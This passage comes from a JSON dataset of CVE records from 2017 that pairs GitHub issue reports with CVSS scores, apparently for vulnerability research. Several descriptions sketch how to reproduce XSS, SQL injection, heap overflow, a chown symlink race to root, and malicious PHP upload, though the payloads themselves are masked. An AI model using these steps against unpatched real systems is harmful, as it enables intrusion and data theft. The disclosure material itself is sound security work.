  10591. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10592. "severity": "MEDIUM",
  10593. "baseScore": 5.5,
  10594. "impactScore": 3.6,
  10595. "exploitabilityScore": 1.8
  10596. },
  10597. {
  10598. "CVE_ID": "CVE-2017-16796",
  10599. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/51",
  10600. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/51",
  10601. "Repo_new": "matthiaskramm/swftools",
  10602. "Issue_Created_At": "2017-11-12T09:09:05Z",
  10603. "description": "3 bugs of png2swf. bug NUMBERTAG atribute write caused by a logic bug In function png_load, there is no check for realoc. If the result of realloc is NUMBERTAG the data will be written into address zimagedatalen. We could control the value of zimagedatalen to achieve atribute write. URLTAG URLTAG bug NUMBERTAG crash caused by a logic bug In fuction png_read_chunk, there is no check for malloc. If malloc failed, destdata NUMBERTAG fread will write address NUMBERTAG and crash the binary. URLTAG URLTAG bug NUMBERTAG integer overflow > heapoverflow In function png_load, both header,width and APITAG are NUMBERTAG bytes, and alleclen NUMBERTAG is NUMBERTAG bytes. header,width APITAG NUMBERTAG may be greater than NUMBERTAG bytes, which caused integer overflow. Further can cause heap overflow. URLTAG",
  10604. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  10605. "severity": "HIGH",
  10606. "baseScore": 7.8,
  10607. "impactScore": 5.9,
  10608. "exploitabilityScore": 1.8
  10609. },
  10610. {
  10611. "CVE_ID": "CVE-2017-16801",
  10612. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3915",
  10613. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3915",
  10614. "Repo_new": "octopusdeploy/issues",
  10615. "Issue_Created_At": "2017-11-13T03:07:06Z",
  10616. "description": "Step Template Name XSS Vulnerability. There is a XSS vulnerability in the step template name, when either importing or adding a custom step template. Refer to: URLTAG Also see: URLTAG",
  10617. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  10618. "severity": "MEDIUM",
  10619. "baseScore": 5.4,
  10620. "impactScore": 2.7,
  10621. "exploitabilityScore": 2.3
  10622. },
  10623. {
  10624. "CVE_ID": "CVE-2017-16805",
  10625. "Issue_Url_old": "https://github.com/radare/radare2/issues/8813",
  10626. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8813",
  10627. "Repo_new": "radareorg/radare2",
  10628. "Issue_Created_At": "2017-11-08T20:34:24Z",
  10629. "description": "Invalid read in APITAG Invalid read in APITAG Git HEAD: APITAG Crashing testcase in URLTAG Command: APITAG ASAN: ERRORTAG",
  10630. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10631. "severity": "MEDIUM",
  10632. "baseScore": 5.5,
  10633. "impactScore": 3.6,
  10634. "exploitabilityScore": 1.8
  10635. },
  10636. {
  10637. "CVE_ID": "CVE-2017-16808",
  10638. "Issue_Url_old": "https://github.com/the-tcpdump-group/tcpdump/issues/645",
  10639. "Issue_Url_new": "https://github.com/the-tcpdump-group/tcpdump/issues/645",
  10640. "Repo_new": "the-tcpdump-group/tcpdump",
  10641. "Issue_Created_At": "2017-11-12T19:13:50Z",
  10642. "description": "Heap Overread triggered by sending specific packets over a interface being monitored by APITAG as well as while trying to parse the pcap file of these packets. There seems to be a heap based buffer overread while running tcpdump on a crafted pcap file. A similar behavior is seen when tcpdump is listening on an interface and the contents of this file is relayed over the network. In order to trigger the vulnerability, run APITAG The relevant APITAG output: The memcheck output has been attached because it was too long. _memcheck APITAG FILETAG Debug info: Tcpdump version: APITAG Libcap version: libpcap NUMBERTAG OS: Ubuntu NUMBERTAG Compiler: gcc NUMBERTAG Target NUMBERTAG linux gnu Hexdump of Input: CODETAG I performed some analysis with gdb to identify what was causing the issue. On adding a breakpoint in main and the function ether_print using: CODETAG GDB gave the following output: ERRORTAG Values after code execution APITAG When the breakpoint reaches the second time. APITAG ep has no values, and the fetching fails on APITAG CODETAG Looks like a heap overread is happening resulting in NULL or garbage values. Note that running Tcpdump without Memcheck doesn\u2019t result in a crash: APITAG : ERRORTAG Valgrind Network Output : The network memcheck output has been attached because it was too long. _memcheck APITAG FILETAG Credits for discovering the potential memory error goes to MENTIONTAG I performed the analysis and designed the POC for tcpdump on both the pcap file as well as on the network. PS Sorry for the long ish bug report.",
  10643. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10644. "severity": "MEDIUM",
  10645. "baseScore": 5.5,
  10646. "impactScore": 3.6,
  10647. "exploitabilityScore": 1.8
  10648. },
  10649. {
  10650. "CVE_ID": "CVE-2017-16810",
  10651. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3919",
  10652. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3919",
  10653. "Repo_new": "octopusdeploy/issues",
  10654. "Issue_Created_At": "2017-11-14T00:28:58Z",
  10655. "description": "XSS vulnerability in the All Variables tab. See URLTAG source: URLTAG Steps to recreate NUMBERTAG Create a new variable set NUMBERTAG Put your XSS payload in the name of the variable set, for example: ERRORTAG FILETAG NUMBERTAG Add a variable to your variable set, can be anything you want FILETAG NUMBERTAG Add your variable set to an existing or new project FILETAG NUMBERTAG iew APITAG Variables\" on your project FILETAG NUMBERTAG SS payload fires repeatedly",
  10656. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  10657. "severity": "MEDIUM",
  10658. "baseScore": 5.4,
  10659. "impactScore": 2.7,
  10660. "exploitabilityScore": 2.3
  10661. },
  10662. {
  10663. "CVE_ID": "CVE-2017-16820",
  10664. "Issue_Url_old": "https://github.com/collectd/collectd/issues/2291",
  10665. "Issue_Url_new": "https://github.com/collectd/collectd/issues/2291",
  10666. "Repo_new": "collectd/collectd",
  10667. "Issue_Created_At": "2017-05-18T22:56:47Z",
  10668. "description": "SNMP table . Version of collectd NUMBERTAG bpo NUMBERTAG from debian jessie backports repo Operating system / distribution: debian NUMBERTAG jessie Expected behavior I am polling connected clients across about NUMBERTAG ubiquiti access points from the SNMP Station table. A few of the Access points have NUMBERTAG clients, and therefore return nothing. If the instance string returns nothing it should gracefully log(optional) and move on to the next task. Actual behavior After much testing I narrowed it down to a single access point which I realized had no clients attached. With only that client configured I get the double free or corruption error. collectd T Error in `collectd': double free or corruption (!pre NUMBERTAG dd NUMBERTAG Aborted If the instance OID returns no data it dies here. Configs to reproduce my_types.db >ubnt_rm5_sta signal:GAUGE:U:U, noisefloor:GAUGE:U:U, ccq:GAUGE:U:U, amq:GAUGE:U:U, amc:GAUGE:U:U snmp APITAG APITAG snmp> > APITAG \"stations\"> > Type \"ubnt_rm5_sta\" > Table true > Instance APITAG > Values APITAG APITAG APITAG APITAG APITAG > APITAG > > APITAG \"ubnt rm5 allstate N NUMBERTAG Address APITAG > Version NUMBERTAG Community \"public\" > Collect \"stations\" > APITAG > APITAG Extra info from the mib for what I'm polling. >snmptranslate m PATHTAG Tz | grep APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Let me know if you need any more information.",
  10669. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10670. "severity": "CRITICAL",
  10671. "baseScore": 9.8,
  10672. "impactScore": 5.9,
  10673. "exploitabilityScore": 3.9
  10674. },
  10675. {
  10676. "CVE_ID": "CVE-2017-16821",
  10677. "Issue_Url_old": "https://github.com/b3log/symphony/issues/503",
  10678. "Issue_Url_new": "https://github.com/b3log/symphony/issues/503",
  10679. "Repo_new": "b3log/symphony",
  10680. "Issue_Created_At": "2017-11-14T15:44:01Z",
  10681. "description": "Cross Site Scripting vulnerability in user center. Hi,man.I found a Cross Site Scripting vulnerability in user center First ,my test environment OS : APITAG NUMBERTAG Browser : APITAG Data : APITAG NUMBERTAG PM Second ,vulnerability details I built a program with symphony. Location : PATHTAG userid Exploit Method : APITAG a account APITAG IP(symphony is based on X Forwarded For to get the IP),so i can change the content of the HTTP Headers X Forwarded APITAG content is xss payload APITAG . APITAG APITAG to your account based on the above steps NUMBERTAG If admin edit your user APITAG is triggered NUMBERTAG Administrator perspective : APITAG Xss payload alert : APITAG Third,others This vulnerability can get Administrator's APITAG can be imagined. Vulnerability Reporter : vulkey(mstsec)",
  10682. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  10683. "severity": "MEDIUM",
  10684. "baseScore": 5.4,
  10685. "impactScore": 2.7,
  10686. "exploitabilityScore": 2.3
  10687. },
  10688. {
  10689. "CVE_ID": "CVE-2017-16834",
  10690. "Issue_Url_old": "https://github.com/lingej/pnp4nagios/issues/140",
  10691. "Issue_Url_new": "https://github.com/lingej/pnp4nagios/issues/140",
  10692. "Repo_new": "lingej/pnp4nagios",
  10693. "Issue_Created_At": "2017-11-02T17:20:33Z",
  10694. "description": "Root privilege escalation via insecure config permissions. I think pnp4nagios has the same problem as nagios core: URLTAG Since the same sort of APITAG are used, we wind up with e.g. APITAG and in particular APITAG owned by the \"nagios\" (or \"icinga\", or whatever) user. However, the contents of APITAG are sensitive: if the \"nagios\" user can edit them, he can remove, APITAG and set APITAG Afterwards, anything he can make npcd do, will be done as root. The fix is probably the same: I think everything under APITAG should be owned by root instead of by the nagios user/group. I'm not a pnp4nagios expert, though, so there may be problems with that approach that I'm unaware of. What happens if we just drop APITAG ?",
  10695. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  10696. "severity": "HIGH",
  10697. "baseScore": 7.8,
  10698. "impactScore": 5.9,
  10699. "exploitabilityScore": 1.8
  10700. },
  10701. {
  10702. "CVE_ID": "CVE-2017-16868",
  10703. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/52",
  10704. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/52",
  10705. "Repo_new": "matthiaskramm/swftools",
  10706. "Issue_Created_At": "2017-11-13T00:08:03Z",
  10707. "description": "An integer overflow bug of wa NUMBERTAG swf. URLTAG when malloc. there is an integer overflow bug: (samplelen ratio NUMBERTAG that make the malloc failed. so samples is NUMBERTAG URLTAG when memcpy use samples\uff0cit cause a null pointer dereference bug memcpy(samples2, samples, numsamples sizeof(U NUMBERTAG",
  10708. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10709. "severity": "MEDIUM",
  10710. "baseScore": 5.5,
  10711. "impactScore": 3.6,
  10712. "exploitabilityScore": 1.8
  10713. },
  10714. {
  10715. "CVE_ID": "CVE-2017-16869",
  10716. "Issue_Url_old": "https://github.com/upx/upx/issues/146",
  10717. "Issue_Url_new": "https://github.com/upx/upx/issues/146",
  10718. "Repo_new": "upx/upx",
  10719. "Issue_Created_At": "2017-11-15T06:23:41Z",
  10720. "description": "SIGSEGV checking corrupted Mach O file APITAG APITAG What's the problem (or question)? SIGSEGV in upx when packing the segfault macho input file in the attached FILETAG . APITAG APITAG (this NUMBERTAG b NUMBERTAG at APITAG NUMBERTAG if (lc_seg == segptr >cmd) { Accessing illegal memory in register rdx. What should have happened? Program received signal SIGSEGV, Segmentation fault. Do you have an idea for a solution? How can we reproduce the issue NUMBERTAG upx segfault macho NUMBERTAG Please tell us details about your environment. UPX version used ( APITAG ): up NUMBERTAG git NUMBERTAG a NUMBERTAG d9b NUMBERTAG UCL data compression library NUMBERTAG zlib data compression library NUMBERTAG LZMA SDK version NUMBERTAG Host Operating System and version: Ubuntu NUMBERTAG linu NUMBERTAG Host CPU architecture NUMBERTAG Target Operating System and version: Mac OS Target CPU architecture NUMBERTAG",
  10721. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  10722. "severity": "HIGH",
  10723. "baseScore": 7.8,
  10724. "impactScore": 5.9,
  10725. "exploitabilityScore": 1.8
  10726. },
  10727. {
  10728. "CVE_ID": "CVE-2017-16881",
  10729. "Issue_Url_old": "https://github.com/b3log/symphony/issues/504",
  10730. "Issue_Url_new": "https://github.com/b3log/symphony/issues/504",
  10731. "Repo_new": "b3log/symphony",
  10732. "Issue_Created_At": "2017-11-18T09:01:37Z",
  10733. "description": "XSS via the account avatar link as well. Hi, I hope you can generalize from the previous report: the XSS fix in the user APITAG covered only one place. There is also an XSS vulnerability in the account avatar link; I can enter an XSS payload APITAG as the avatar link. My test environment OS : APITAG NUMBERTAG Browser : APITAG Tool : APITAG Data : APITAG NUMBERTAG PM Vulnerability details Location : /settings/avatar While setting my avatar, I used APITAG to capture the HTTP requests: APITAG Analysis of the packets. First packet: Method : POST URI : /upload Content : the uploaded picture. Second packet: Method : POST URI : /settings/avatar Content : JSON request > APITAG The second packet shows how the avatar link is stored, so only it needs to be tested. I changed the value of the JSON parameter APITAG to the XSS payload APITAG . APITAG Attack: the payload is saved as the avatar link and executes when other users view my avatar, allowing me to obtain their cookies. APITAG Come on, my good friend.",
  10734. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  10735. "severity": "MEDIUM",
  10736. "baseScore": 6.1,
  10737. "impactScore": 2.7,
  10738. "exploitabilityScore": 2.8
  10739. },
  10740. {
  10741. "CVE_ID": "CVE-2017-16882",
  10742. "Issue_Url_old": "https://github.com/Icinga/icinga-core/issues/1601",
  10743. "Issue_Url_new": "https://github.com/icinga/icinga-core/issues/1601",
  10744. "Repo_new": "icinga/icinga-core",
  10745. "Issue_Created_At": "2017-11-18T01:03:42Z",
  10746. "description": "Root privilege escalation via insecure permissions. Hello, Unfortunately icinga core has the same problem with its installed permissions that nagios core has, reported in URLTAG The following executables are installed owned by the _icinga_ user: APITAG APITAG APITAG APITAG and likewise with the config files at least the following are vulnerable: APITAG APITAG (yeah, it's a sample, but better safe than sorry) The executables are exploitable because _icinga_ can edit them and _root_ will run them; the configs are vulnerable because _icinga_ can edit them to give the daemons instructions and then insist that those daemons run as _root_. The good news for you, potentially, is that maybe you don't care about maintaining compatibility with Nagios XI, and can set APITAG to APITAG . My personal instinct would be to drop the APITAG all around, and then give the icinga user write permission only on those directories it needs. If somebody wants to manage the configs other than icinga.cfg with a dedicated, non _icinga_ group then he could do that either on his own or potentially with a new APITAG flag.",
  10747. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  10748. "severity": "HIGH",
  10749. "baseScore": 7.8,
  10750. "impactScore": 5.9,
  10751. "exploitabilityScore": 1.8
  10752. },
  10753. {
  10754. "CVE_ID": "CVE-2017-16883",
  10755. "Issue_Url_old": "https://github.com/libming/libming/issues/77",
  10756. "Issue_Url_new": "https://github.com/libming/libming/issues/77",
  10757. "Repo_new": "libming/libming",
  10758. "Issue_Created_At": "2017-06-08T16:29:18Z",
  10759. "description": "invalid memory read in APITAG . On libming latest version, an invalid memory read was found in function APITAG . ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
  10760. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10761. "severity": "MEDIUM",
  10762. "baseScore": 6.5,
  10763. "impactScore": 3.6,
  10764. "exploitabilityScore": 2.8
  10765. },
  10766. {
  10767. "CVE_ID": "CVE-2017-16890",
  10768. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/57",
  10769. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/57",
  10770. "Repo_new": "matthiaskramm/swftools",
  10771. "Issue_Created_At": "2018-07-08T03:37:23Z",
  10772. "description": "Divide-by-zero exception in wav_convert2mono in wav.c. A divide-by-zero in wav_convert2mono (wav.c) allows an attacker to cause a denial of service with a crafted input file. poc file: FILETAG To reproduce: ./wa NUMBERTAG swf o output $poc APITAG APITAG NUMBERTAG ERROR: APITAG FPE on unknown address NUMBERTAG e NUMBERTAG pc NUMBERTAG e NUMBERTAG bp NUMBERTAG ffea NUMBERTAG e NUMBERTAG sp NUMBERTAG ffea NUMBERTAG aa0 T NUMBERTAG e NUMBERTAG in wav_convert2mono PATHTAG NUMBERTAG ebc NUMBERTAG in main PATHTAG NUMBERTAG f2f0dd NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG c8 in _start ( PATHTAG )",
  10773. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10774. "severity": "MEDIUM",
  10775. "baseScore": 5.5,
  10776. "impactScore": 3.6,
  10777. "exploitabilityScore": 1.8
  10778. },
  10779. {
  10780. "CVE_ID": "CVE-2017-16893",
  10781. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/804",
  10782. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/804",
  10783. "Repo_new": "piwigo/piwigo",
  10784. "Issue_Created_At": "2017-11-20T06:00:15Z",
  10785. "description": "SQL injection in version NUMBERTAG. SQL injection in version NUMBERTAG in FILETAG CODETAG The values of the edit_list parameter are not sanitized; they are concatenated into the SQL query that retrieves the list of registered users in the application. To trigger it, POST the data in FILETAG",
  10786. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  10787. "severity": "MEDIUM",
  10788. "baseScore": 6.5,
  10789. "impactScore": 3.6,
  10790. "exploitabilityScore": 2.8
  10791. },
  10792. {
  10793. "CVE_ID": "CVE-2017-16898",
  10794. "Issue_Url_old": "https://github.com/libming/libming/issues/75",
  10795. "Issue_Url_new": "https://github.com/libming/libming/issues/75",
  10796. "Repo_new": "libming/libming",
  10797. "Issue_Created_At": "2017-06-07T14:59:00Z",
  10798. "description": "global buffer overflow in APITAG On libming latest version, a global buffer overflow was found in function APITAG CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  10799. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10800. "severity": "MEDIUM",
  10801. "baseScore": 5.5,
  10802. "impactScore": 3.6,
  10803. "exploitabilityScore": 1.8
  10804. },
  10805. {
  10806. "CVE_ID": "CVE-2017-16919",
  10807. "Issue_Url_old": "https://github.com/RamonSilva20/mapos/issues/81",
  10808. "Issue_Url_new": "https://github.com/ramonsilva20/mapos/issues/81",
  10809. "Repo_new": "ramonsilva20/mapos",
  10810. "Issue_Created_At": "2017-11-21T02:00:26Z",
  10811. "description": "Ordens de Servi\u00e7o Stored Cross site Scripting (XSS). Ol\u00e1, gostaria de reportar uma falha de stored cross site scripting na funcionalidade de visualizar clientes. A falha encontra se no campo Descri\u00e7\u00e3o da ordem de servi\u00e7o. Quando um administrador visualiza um cliente que tem ordem de servi\u00e7o em aberto, caso haja c\u00f3digo javascript no campo descri\u00e7\u00e3o dessa ordem de servi\u00e7o, esse c\u00f3digo \u00e9 executado. Para checar at\u00e9 a falha, \u00e9 necess\u00e1rio seguir os passos abaixo NUMBERTAG Registrar um cliente em URLTAG NUMBERTAG Logar com o cliente registrado e adicionar uma ordem de servi\u00e7o, dentro do campo descri\u00e7\u00e3o inserir um javascript qualquer, por exemplo: APITAG alert('xss'); APITAG NUMBERTAG Em seguida logar com o usu\u00e1rio administrador, ir em Clientes e visualizar o novo cliente registrado. O c\u00f3digo inserido no passo NUMBERTAG ser\u00e1 executado.",
  10812. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  10813. "severity": "MEDIUM",
  10814. "baseScore": 5.4,
  10815. "impactScore": 2.7,
  10816. "exploitabilityScore": 2.3
  10817. },
  10818. {
  10819. "CVE_ID": "CVE-2017-16933",
  10820. "Issue_Url_old": "https://github.com/Icinga/icinga2/issues/5793",
  10821. "Issue_Url_new": "https://github.com/icinga/icinga2/issues/5793",
  10822. "Repo_new": "icinga/icinga2",
  10823. "Issue_Created_At": "2017-11-23T01:52:28Z",
  10824. "description": "Root privilege escalation via prepare dirs (init script and systemd service file). The APITAG file calls chown unsafely, leading to a root exploit for the APITAG . The tl;dr is that it's never safe to call chown as root, unless the target and all directories above it are controlled wholly by root. A few uses of chown in APITAG are exploitable; here's an example: CODETAG The first line gives away ownership of the directory containing the APITAG , and the next line calls chown on that file. The exploit is that, after the first line executes, the APITAG can simply replace APITAG with a link (sym _or_ hard) to a root owned file. The call to chown will then change ownership of the link's _target_. That is easily exploitable to gain root, by taking ownership of e.g. APITAG or root's APITAG file. To exploit this the first time the service is started, you need to take advantage of the race condition to create a link before the APITAG test is executed. However, there's a much easier scenario: if the service is started, stopped, and started again (even across reboots, for persistent directories), then the APITAG test will succeed, and call chown on a path that has been controlled by APITAG since the first time the service was started. As for the fix, I would entirely eliminate the ability to change the value of APITAG and APITAG at runtime, since there is no safe way for you to fix the permissions after it is changed. Once those variables are eliminated, you don't need to call chown on the directories or files: the directories can be created with the correct ownership by make install , and the files will be owned by the user who creates them (namely the icinga runtime user, who will be the one writing to them, and that user will never change). If you would rather keep those variables, just let the init/service script crash if the permissions are wrong. Users will have to be responsible for fixing the existing permissions if they make a major change like switching an in use UID/GID on a live system. APITAG is not mere sadism on my part; there really is no safe way to automate the necessary changes.) This affects both the init script and systemd service file: URLTAG URLTAG",
  10825. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  10826. "severity": "HIGH",
  10827. "baseScore": 7.0,
  10828. "impactScore": 5.9,
  10829. "exploitabilityScore": 1.0
  10830. },
  10831. {
  10832. "CVE_ID": "CVE-2017-16941",
  10833. "Issue_Url_old": "https://github.com/octobercms/october/issues/3257",
  10834. "Issue_Url_new": "https://github.com/octobercms/october/issues/3257",
  10835. "Repo_new": "octobercms/october",
  10836. "Issue_Created_At": "2017-11-22T11:57:17Z",
  10837. "description": "OctoberCMS has an arbitrary file upload vulnerability in the latest version (via theme import). Expected behavior: Well, dear sir, I just found an arbitrary upload vulnerability in OctoberCMS of the latest version. Reproduce steps: after logging into the backend, visit: APITAG You can obtain the demo zip by exporting the demo theme; you now have a zip file of the demo theme. Then add two files to the zip: one malicious PHP file and one .htaccess file. .htaccess CODETAG FILETAG APITAG Now upload the modified zip file and import it so that it overwrites the original demo theme folder. After the upload succeeds, the malicious file is present there. Because of the new .htaccess file, I can now request the FILETAG file directly and it executes, showing the PHP information of the server. APITAG October build: the latest version. I look forward to your response, sir!",
  10838. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  10839. "severity": "HIGH",
  10840. "baseScore": 8.8,
  10841. "impactScore": 5.9,
  10842. "exploitabilityScore": 2.8
  10843. },
  10844. {
  10845. "CVE_ID": "CVE-2017-16942",
  10846. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/341",
  10847. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/341",
  10848. "Repo_new": "libsndfile/libsndfile",
  10849. "Issue_Created_At": "2017-11-25T07:55:51Z",
  10850. "description": "A divide-by-zero vulnerability in function APITAG in the libsndfile NUMBERTAG ubuntu NUMBERTAG source package in Ubuntu. The fault is in wav_w NUMBERTAG read_fmt_chunk while computing bytespersec; the divisor is apparently a value parsed from the file's fmt chunk and is not checked for zero, so a crafted WAV file raises SIGFPE (denial of service). PATHTAG gdb ./aubiomfcc GNU gdb APITAG NUMBERTAG APITAG NUMBERTAG Copyright (C NUMBERTAG Free Software Foundation, Inc. License GPL NUMBERTAG GNU GPL version NUMBERTAG or later APITAG This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type \"show copying\" and \"show warranty\" for details. This GDB was configured as NUMBERTAG linux gnu\". Type \"show configuration\" for configuration details. For bug reporting instructions, please see: APITAG . Find the GDB manual and other documentation resources online at: APITAG . For help, type \"help\". Type \"apropos word\" to search for commands related to \"word\"... Reading symbols from . APITAG (gdb) r i PATHTAG Starting program: PATHTAG i PATHTAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Program received signal SIGFPE, Arithmetic exception NUMBERTAG ffff NUMBERTAG aaab in wav_w NUMBERTAG read_fmt_chunk (psf=psf APITAG fmtsize NUMBERTAG at APITAG NUMBERTAG bytespersec = (wav_fmt APITAG wav_fmt APITAG / wav_fmt APITAG ; (gdb) bt NUMBERTAG ffff NUMBERTAG aaab in wav_w NUMBERTAG read_fmt_chunk (psf=psf APITAG fmtsize NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG ca NUMBERTAG in wav_read_header ( framesperblock=<synthetic pointer>, blockalign=<synthetic pointer>, psf NUMBERTAG f0) at APITAG NUMBERTAG wav_open (psf=psf APITAG at APITAG NUMBERTAG ffff NUMBERTAG f4 in psf_open_file (psf NUMBERTAG f0, APITAG at APITAG NUMBERTAG ffff NUMBERTAG e0 in sf_open ( path=path APITAG \"hfl crash NUMBERTAG APITAG mode=mode APITAG APITAG at APITAG NUMBERTAG dc in new_aubio_source_sndfile ( APITAG \"hfl crash NUMBERTAG APITAG APITAG hop_size=hop_size APITAG at PATHTAG NUMBERTAG ERRORTAG a NUMBERTAG in new_aubio_source ( uri NUMBERTAG fffffffe NUMBERTAG hfl crash NUMBERTAG APITAG samplerate NUMBERTAG hop_size NUMBERTAG at PATHTAG NUMBERTAG in examples_common_init NUMBERTAG af in main () (gdb NUMBERTAG i $pc NUMBERTAG ffff NUMBERTAG aaab APITAG div %r9d NUMBERTAG ffff NUMBERTAG aaae APITAG cmp %edi,%ea NUMBERTAG ffff NUMBERTAG aab0 APITAG mov %eax,%ec NUMBERTAG ffff NUMBERTAG aab2 APITAG je NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG (gdb) i r ra NUMBERTAG f NUMBERTAG rb NUMBERTAG f NUMBERTAG rc NUMBERTAG rd NUMBERTAG rsi NUMBERTAG f NUMBERTAG rdi NUMBERTAG rbp NUMBERTAG rsp NUMBERTAG fffffffe0f NUMBERTAG fffffffe0f0 r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG rip NUMBERTAG ffff NUMBERTAG aaab NUMBERTAG ffff NUMBERTAG aaab APITAG eflags NUMBERTAG PF IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG Type APITAG to continue, or q APITAG to quit",
  10851. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10852. "severity": "MEDIUM",
  10853. "baseScore": 6.5,
  10854. "impactScore": 3.6,
  10855. "exploitabilityScore": 2.8
  10856. },
  10857. {
  10858. "CVE_ID": "CVE-2017-16961",
  10859. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/323",
  10860. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/323",
  10861. "Repo_new": "bigtreecms/bigtree-cms",
  10862. "Issue_Created_At": "2017-11-22T08:49:39Z",
  10863. "description": "SQL injection in APITAG CMS NUMBERTAG. SQL injection in APITAG CMS NUMBERTAG. APITAG day. > I found a SQL injection vulnerability in APITAG CMS through APITAG. This vulnerability allows remote authenticated attackers to obtain information in the context of the database user the application uses to retrieve data. File: PATHTAG ERRORTAG The values of the temp_tags parameters are not sanitized, and they are read back out of the database before being used in the query (a second-order injection): we can first store an attack string in the table, then access this code path to complete the attack chain. PoC: first, add a tree ERRORTAG FILETAG If there are any questions, please send me the details by email at EMAILTAG",
  10864. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  10865. "severity": "MEDIUM",
  10866. "baseScore": 6.5,
  10867. "impactScore": 3.6,
  10868. "exploitabilityScore": 2.8
  10869. },
  10870. {
  10871. "CVE_ID": "CVE-2017-17054",
  10872. "Issue_Url_old": "https://github.com/aubio/aubio/issues/148",
  10873. "Issue_Url_new": "https://github.com/aubio/aubio/issues/148",
  10874. "Repo_new": "aubio/aubio",
  10875. "Issue_Created_At": "2017-11-28T06:12:00Z",
  10876. "description": "a div zero vul in function APITAG in APITAG PATHTAG gdb ./aubioquiet GNU gdb APITAG NUMBERTAG APITAG NUMBERTAG Copyright (C NUMBERTAG Free Software Foundation, Inc. License GPL NUMBERTAG GNU GPL version NUMBERTAG or later APITAG This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type \"show copying\" and \"show warranty\" for details. This GDB was configured as NUMBERTAG linux gnu\". Type \"show configuration\" for configuration details. For bug reporting instructions, please see: APITAG . Find the GDB manual and other documentation resources online at: APITAG . For help, type \"help\". Type \"apropos word\" to search for commands related to \"word\"... Reading symbols from . APITAG (gdb) r i APITAG Starting program: PATHTAG i APITAG FILETAG",
  10877. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10878. "severity": "MEDIUM",
  10879. "baseScore": 5.5,
  10880. "impactScore": 3.6,
  10881. "exploitabilityScore": 1.8
  10882. },
  10883. {
  10884. "CVE_ID": "CVE-2017-17058",
  10885. "Issue_Url_old": "https://github.com/woocommerce/woocommerce/issues/17964",
  10886. "Issue_Url_new": "https://github.com/woocommerce/woocommerce/issues/17964",
  10887. "Repo_new": "woocommerce/woocommerce",
  10888. "Issue_Created_At": "2017-11-30T03:07:37Z",
